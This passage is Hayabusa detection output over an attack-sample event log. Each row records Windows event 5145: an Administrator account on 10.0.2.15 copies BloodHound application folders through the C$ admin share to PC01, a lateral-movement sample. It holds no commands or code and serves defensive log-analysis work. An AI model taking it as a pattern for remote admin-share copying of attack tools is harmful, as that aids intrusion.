+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
